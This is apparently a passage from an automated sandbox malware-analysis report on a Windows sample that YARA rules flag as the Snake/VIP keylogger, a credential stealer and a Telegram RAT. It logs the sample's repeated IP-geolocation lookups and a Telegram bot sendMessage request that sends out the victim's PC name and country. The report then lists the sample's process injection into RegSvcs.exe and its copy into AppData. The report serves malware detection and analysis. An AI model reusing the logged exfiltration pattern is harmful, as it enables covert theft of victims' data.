63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49766	188.114.96.3	443	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:23 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-08 14:44:24 UTC	853	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662253 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8Vt%2FgeE6hX9GMrxODaoT05Vp2u43tDL3oIcY3lvrXnAmmXsPbYGVDWc%2FwS10FgheWxo5dIQVrJ5VXQVRPNqeOXEGSiPfmvHAxfLpHC0ofNTYJUJaW0SsyGrqScA15fcf3AgVy34"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf721af6772aa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1952&rtt_var=747&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1450571&cwnd=191&unsent_bytes=0&cid=05b365fda0fdd1de&ts=156&x=0"
2025-01-08 14:44:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49778	188.114.96.3	443	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:25 UTC	861	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662254 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F%2FvlKLng%2FTf2IYQciARb4eJz61M8ttx1tqtPfZ8cvmxnThtVgVj27LB891LlFKtSY%2FNYHnW6Zpae7%2FX81NLwVmCDTZF%2FyUIqGkZLcQk1C%2FBFKgUVhbpZVgYIgfl0cqQW2tb7oN30"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf72a4fc8ef9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2031&min_rtt=2017&rtt_var=766&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1447694&cwnd=219&unsent_bytes=0&cid=840d545387ecf593&ts=206&x=0"
2025-01-08 14:44:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49789	188.114.96.3	443	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:26 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:26 UTC	859	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662255 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3sowbZamt2OljV09jEYxJ2pE4dtuhK%2FqTVUli8jNtcNbx%2BdzQDF05IHWDPrpbxAlibg4XU0RMsJX88%2BvRkMkr0vRp%2B4Pby%2FdKL3Zrfdw6l9VyRidJ4ZjpT7ug7DndxyzkTiiwMuN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf732bc7118f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1615&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1785932&cwnd=232&unsent_bytes=0&cid=d95363705391645b&ts=150&x=0"
2025-01-08 14:44:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49801	188.114.96.3	443	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:27 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:28 UTC	861	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662257 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HwRgC%2FLgIV6n1CglVCUUnt81tiAEvyGdHDy5ScjMDsbjPdkP7wMs44UuNMTlFJn7J%2Fthf%2FDslnWmFGrjUgPeTkI7IT2fxSESr%2B29MMTgA8f%2Fa%2FTBe9wlRavX3YKTbGbdIqL54Kqf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf73b0af04288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1626&rtt_var=624&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1734997&cwnd=246&unsent_bytes=0&cid=52758b41b76b936d&ts=166&x=0"
2025-01-08 14:44:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49810	188.114.96.3	443	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:29 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-08 14:44:29 UTC	857	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662258 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ROp586%2Bp2By6SJO8zxefnNVFtrnIqApRiAuvEBeBALRCy%2FEUBFxNifTnka9D8vOd1hCYWzAGyJD%2F8zWrvb3CIHFvE2lCVGiwIxlKyTC6dNR6CHj7KmVeaAP8PMy7fSx%2BKzFUxytO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf743482f236a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2079&min_rtt=2073&rtt_var=790&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1373471&cwnd=170&unsent_bytes=0&cid=9cfb604b98d193e2&ts=161&x=0"
2025-01-08 14:44:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49819	188.114.96.3	443	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:30 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:30 UTC	859	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662259 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYN6yVIsyj3UPJoLZwsRhTjntg6uFxHcxFbL4ClO%2B31yeHXTdZDDb258w0AfPYTDU44OjXMufq7Ne9qDd%2FoSAjbjtrrWGxMx2L4b%2FRQQFZ%2FNrEHITv9sQMPuBVmGXI7ivXK9t04%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf74b6c6f42e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1760&rtt_var=668&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1629464&cwnd=234&unsent_bytes=0&cid=d0d159c53e01a284&ts=140&x=0"
2025-01-08 14:44:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49830	188.114.96.3	443	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:31 UTC	851	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662261 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HN7pDIakN8nT18rkBarBvp0ya26JVjTsZ1cQPRVajnyBMeGqDDU5ccVM7Ublj5q84UR1FGWoA1mEksp%2F06hppuBW8flSxoIqmIt3TXyGNTNjNlCgZ5keXtaEjyVHkEt5XwmBs9qK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf7537d2f8c89-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1991&rtt_var=767&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1408586&cwnd=202&unsent_bytes=0&cid=10ffe7885c903fb9&ts=150&x=0"
2025-01-08 14:44:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49838	188.114.96.3	443	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:33 UTC	859	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662262 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0eb3DfmD%2B%2FCLr4MlW7K1JNABMyQ%2F4ZOwxhXpWPxAlPiXR5mBI82dCrBVZSYEUAyqAaJC24kqAe8wM5w3Doph%2BLffPgFzE9aY0i62sgDd4wq1CVIgeIoeOfqKvyHRZ%2FcXoC6vbYSH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf75c7f494393-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1609&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1800246&cwnd=201&unsent_bytes=0&cid=1da1fdcbdacd3c78&ts=160&x=0"
2025-01-08 14:44:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49844	149.154.167.220	443	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:34 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2021:09:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-08 14:44:34 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 14:44:34 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-08 14:44:34 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	09:43:58
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\oagkiAhXgZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\oagkiAhXgZ.exe"
Imagebase:	0xaa0000
File size:	1'111'040 bytes
MD5 hash:	EB8C8ACAE9D3A669129902384F5335B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:44:01
Start date:	08/01/2025
Path:	C:\Users\user\AppData\Local\Thebesian\reindulgence.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\oagkiAhXgZ.exe"
Imagebase:	0xf60000
File size:	1'111'040 bytes
MD5 hash:	EB8C8ACAE9D3A669129902384F5335B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:44:03
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\oagkiAhXgZ.exe"
Imagebase:	0x5f0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4503499824.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 